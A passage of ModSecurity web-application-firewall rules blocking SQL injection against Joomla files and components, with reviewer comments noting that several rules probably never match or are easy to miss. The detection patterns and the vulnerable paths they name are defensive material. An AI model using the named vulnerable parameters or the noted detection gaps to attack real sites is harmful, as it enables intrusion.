Attempt -- index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005297) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005297,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- category.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005303) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005303,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005395,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005401) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- gmail.php UPDATE SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005401,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005413,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- ldap.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005419,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005425,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:where/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- content.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005431,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:where/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005437,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005443) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- categories.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/categories.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005443,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005449) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005449,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule &TX:'/SQL_INJECTION.*ARGS:text/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- user.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
SecRule &TX:'/SQL_INJECTION.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2009917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection
# Two-link chain. The first link requires "/index.php" in REQUEST_LINE after
# urlDecodeUni, htmlEntityDecode and normalisePathWin. The second link counts
# TX variables whose name matches the regex; when the count is above zero the
# chain completes, tx.critical_anomaly_score is added to tx.anomaly_score and
# the match is recorded under a rule-specific TX name.
# NOTE(review): the TX name pattern embeds query-string text
# ("option=com_djcatalog&view=showItem&id") after "ARGS:". The setvar used in
# this file names such variables "...SQL_INJECTION-%{matched_var_name}", and
# for a request parameter matched_var_name has the form "ARGS:NAME". A
# parameter name containing "&" and "=" would not normally exist, so this
# chain likely never completes. Presumably the intent was ARGS:id plus
# separate links for option=com_djcatalog and view=showItem -- confirm against
# the upstream signature and cover it with a regression test.
# NOTE(review): @contains is case-sensitive and the transformation list has no
# t:lowercase, so a differently cased path would not satisfy the first link --
# TODO confirm whether that matters for the deployments this rule targets.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'"
SecRule &TX:'/SQL_INJECTION.*ARGS:option=com_djcatalog&view=showItem&id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2009922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UPDATE SET SQL Injection
# Same two-link shape as rule 2009917 above.
# NOTE(review): same concern as 2009917 -- the TX name pattern contains
# "option=com_jlord_rss&task=feed&id" after "ARGS:", which does not look like
# a name the SQL_INJECTION setvar scheme can produce, so the rule is probably
# inert as written. Verify before counting on it for coverage.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'"
SecRule &TX:'/SQL_INJECTION.*ARGS:option=com_jlord_rss&task=feed&id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009942,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009947,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2009960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection
# Three-link chain: REQUEST_LINE must contain "/index.php?option=com_facebook"
# and "view=student", then QUERY_STRING or REQUEST_BODY must match
# (?i:UPDATE.+SET). On a full match the critical anomaly score is added to
# tx.anomaly_score.
# NOTE(review): unlike the neighbouring SLR rules that count SQL_INJECTION TX
# markers, the last link matches the keywords directly and lists no t:
# transformations of its own. QUERY_STRING is the raw, non-URL-decoded query
# string, so the pattern sees encoded input as sent unless transformations
# reach this link some other way (e.g. SecDefaultAction) -- TODO confirm and
# consider an explicit t:urlDecodeUni on this link.
# NOTE(review): the first link needs "option=com_facebook" to directly follow
# "/index.php?", so the rule only covers requests where option is the first
# query parameter. "view=student" is a bare substring and also matches longer
# values that begin with "student".
SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009960,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'"
SecRule REQUEST_LINE "@contains view=student" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2009965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection
# Same three-link shape as rule 2009960 above, keyed on
# "/index.php?option=com_sportfusion" and "view=teamdetail".
# NOTE(review): the same caveats apply -- raw QUERY_STRING on the last link,
# dependence on option being the first query parameter, and the broad
# UPDATE.+SET pattern, which can also match ordinary text that contains both
# words in that order.
SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'"
SecRule REQUEST_LINE "@contains view=teamdetail" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SportFusion Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010017,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010044,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2010353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt
# Three-link chain: REQUEST_LINE must contain "GET " and
# "index.php?option=com_photoblog&", then at least one TX variable name must
# match the regex. On a full match the critical anomaly score is added to
# tx.anomaly_score.
# NOTE(review): the TX name pattern has a literal "&" after "ARGS:"
# ("ARGS:&category"). The setvar used in this file builds these names from
# %{matched_var_name}, which for a request parameter has the form "ARGS:NAME",
# so the expected name would contain "ARGS:category" and this pattern likely
# never matches -- TODO confirm and drop the "&".
# NOTE(review): the "GET " link limits the rule to request lines containing
# that text, so the same parameter sent with another method is not labelled
# by this rule; presumably the generic SQL injection rules still score it.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010353,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:&category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2010480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt
# Same three-link shape as rule 2010353 above, keyed on
# "index.php?option=com_jshop&".
# NOTE(review): same concern as 2010353 -- "ARGS:&pid" carries a literal "&"
# that an "ARGS:NAME" variable name would not contain, so the final link
# probably cannot match as written. Verify with a regression test.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010480,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'"
SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:&pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010559,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:treeId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010640,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:Id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010714,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,36425'" SecRule REQUEST_LINE "@contains /index.php?option=com_foobla_suggestions&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:idea_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Foobla Suggestions Component idea_id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010754) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010754,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/joomlamg-sql.txt'" SecRule REQUEST_LINE "@contains /index.php?option=com_musicgallery&" "chain" SecRule REQUEST_LINE "@contains &task=itempage" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:Id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_musicgallery Component Id Parameter UPDATE SET SQL Injection 
